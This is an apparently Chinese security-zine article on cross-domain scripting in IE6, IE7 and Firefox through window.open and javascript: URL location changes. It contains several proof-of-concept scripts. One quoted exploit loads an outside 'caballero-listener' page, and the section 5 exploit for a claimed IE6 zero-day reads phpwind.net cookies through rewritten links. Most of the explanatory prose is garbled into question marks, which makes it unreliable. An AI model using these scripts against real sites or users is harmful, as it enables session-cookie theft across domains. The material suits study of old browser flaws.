==Ph4nt0m Security Team==
 
                       Issue 0x02, Phile #0x04 of 0x0A
 

|=---------------------------------------------------------------------------=|
|=-----------------------=[ ?????????????????? ]=----------------------=|
|=---------------------------------------------------------------------------=|
|=---------------------------------------------------------------------------=|
|=-----------------------=[         By rayh4c        ]=----------------------=|
|=----------------------=[    <rayh4c_at_80sec.com>   ]=---------------------=|
|=---------------------------------------------------------------------------=|


    Manuel Caballero???????ε?BLUEHAT?????????????A Resident in My Domain
??????????????????????????????????????????????BLOG??д???Щ????
???????????????HI??????????????????????????????????????????????棬
???????????????????檔???????????????????????????????????????????

1.????αЭ?????

    JAVASCRIPT???????????window????window??????????????????????????
??????????window?????open???????????????????????αЭ?顣

    ??????????WEB?????????????????飺

    ????????????? http://127.0.0.1/test.htm ????????test.htm?????????

    <script>   
    x=window.open("about:blank");
    x.location="javascript:alert(document.domain)"
    </script>

    ??????

    IE6???????αЭ?飬????????????????127.0.0.1??
    IE7???????αЭ?飬????????????????127.0.0.1??
    Firefox???????αЭ??,???????????NULL??

    Firefox??????????????????и?BUG??????IP????????Firefox??б????????
??????????????????????????????

    ????????????????????????????????????￡?????????и????????????
??????????????????????:

    ?????????????????????????????????????URL????????????αЭ?顣


2.????????????

    ?????????????????????????????????????????????

    ?????????????????????? http://127.0.0.1/test2.htm ????????test2.htm????
?????

    <script>   
    x=window.open("about:blank");
    x.location="http://www.163.com" //????163???
    setTimeout(function(){
        x.location="http://127.0.0.1";
    },5000)  //5????????127.0.0.1
    </script>

    ???IE6??IE7??Firefox?????????￡??????????????????163?????5?????????
????127.0.0.1??

    ?????????????????????????????????????????


3.?????????????

    ??????????????????????????αЭ???????Ч????

    ????????????? http://127.0.0.1/test3.htm????????test3.htm?????????

    <script>   
    x=window.open("about:blank");
    x.location="http://www.163.com"
    setTimeout(function(){
        x.location="javascript:alert(document.cookie)";
    },5000)
    </script>

    ??????

    IE6????з????
    IE7???????????????
    Firefox???????alert??ж??塣

    ??Щ????????????????????????????????????????????????????????
???αЭ???????

    ???????????????????????????????????????

    ????????????? http://127.0.0.1/test4.htm????????test4.htm?????????

    <script> 
    document.cookie="xss:true"  //?????????????COOKIE?xss:true
    x=window.open("about:blank");
    x.location="http://127.0.0.1"
    setTimeout(function(){
        x.location="javascript:alert(document.cookie)";
    },5000)
    </script>

    ???IE6??IE7??Firefox????????????COOKIE??????????????????????????
???????????????????????αЭ???????


4.?????????

    ???????????????????????????????????????????PDP???????????????
???????EXP:

    javascript:x=open("http://hackademix.net/");setInterval(function(){try{x.frames[0].location={toString:function(){return "http://www.sirdarckcat.net/caballero-listener.html";}}}catch(e){}},5000);void(1);

    EXP??????????????????????

    ?????A???????????????B???????????????棬????????????B?????????
??URL?????????????????????????

    ?????????????????????window.frames[0]???????????????????????????
location??????????????????????????????

    ????????????·?????????3????????????????,??location??????????
new String()???????

    ????????????? http://127.0.0.1/test5.htm????????test5.htm?????????

    <script>   
    x=window.open("about:blank");
    x.location="http://www.163.com"??
    setTimeout(function(){
        x.location=new String("javascript:alert(document.cookie)")
    },5000)
    </script>

    IE6??????COOKIE??
    IE7???????????????
    Firefox???????alert??ж??塣

    ?????IE6?漣????????COOKIE?????????????????н????

5.?????????

    ??????????????????IE6??0DAY???????????????????????????????????????
EXP??

    <a href="">IE6 Cross Domain Scripting</a>
    <script>
    function win(){
        x=window.open("http://www.phpwind.net");
        setTimeout(function(){
            x.location=new String("javascript:alert(document.cookie)")
        },3000)
    }
    window.onload=function(){
        for (i=0;i<document.links.length;i++) { 
            document.links[i].href="javascript:win()"
        }
    }
    </script>

    ????????????????PHPWIND?????COOKIE???????ζ????????????????????
???????????????????COOKIE?????????????

    ??????????????????????????XSS??????????????????????????????????
??????????????????SSL????????????e??COOKIE????HTTPONLY??????????е?
????????????????


6.???

    ????????????????????????????window???????????????????п????????
????м?й????window??????????仯??????window??????Щ?????????????????
????????????????????????????????????????

    ????????????????????IE7???Щ?μ?????????????й????window???????
????????н??αЭ????????ж???????IE7????????????????????

    ?????????????????????????????IE7????????????н????????????????
????????????е??????????IE7??????????????URL????Firefox???д????????
???????????????????????????????????????

    ???IE??????????????????????????????????????????????????????????
?????????????·??????????????????????????Щ?????????

    ????лHI??????????????

7.?ο?

[1] Browser"s Ghost Busters: http://sirdarckcat.blogspot.com/2008/05/browsers-ghost-busters.html
[2] Ghost Busters: http://www.gnucitizen.org/blog/ghost-busters/

-EOF-